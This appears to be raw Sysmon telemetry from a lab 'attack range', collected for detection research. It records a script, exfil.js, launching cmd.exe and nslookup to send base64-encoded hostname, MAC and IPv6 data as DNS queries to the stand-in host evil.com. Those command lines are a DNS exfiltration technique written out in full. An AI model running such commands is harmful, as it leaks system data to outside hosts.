14:16:41.751{2E1864BB-17A1-629A-783D-000000005F02}55524760C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-9D41-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.746{2E1864BB-17C9-629A-9D41-000000005F02}6488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.726{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmidgzy.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.711{2E1864BB-17C9-629A-9B41-000000005F02}78366856C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9C41-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.711{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.695{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9C41-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.695{2E1864BB-17C9-629A-9A41-000000005F02}7087876C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9C41-000000005F02}5740C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.710{2E1864BB-17C9-629A-9C41-000000005F02}5740C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-9A41-000000005F02}708C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmidgzy.tmp 2>&1 10341000x8000000000000000203311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.679{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9B41-000000005F02}7836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.679{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9B41-000000005F02}7836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.679{2E1864BB-17C9-629A-9B41-000000005F02}78366856C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9A41-000000005F02}708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9B41-000000005F02}7836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9A41-000000005F02}708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.666{2E1864BB-17A1-629A-783D-000000005F02}55526848C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-9A41-000000005F02}708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.665{2E1864BB-17C9-629A-9A41-000000005F02}708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmidgzy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.648{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrln.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.626{2E1864BB-17C9-629A-9841-000000005F02}81606244C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9941-000000005F02}7824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9941-000000005F02}7824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.611{2E1864BB-17C9-629A-9741-000000005F02}78524828C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9941-000000005F02}7824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.620{2E1864BB-17C9-629A-9941-000000005F02}7824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-9741-000000005F02}7852C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrln.tmp 2>&1 10341000x8000000000000000203291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 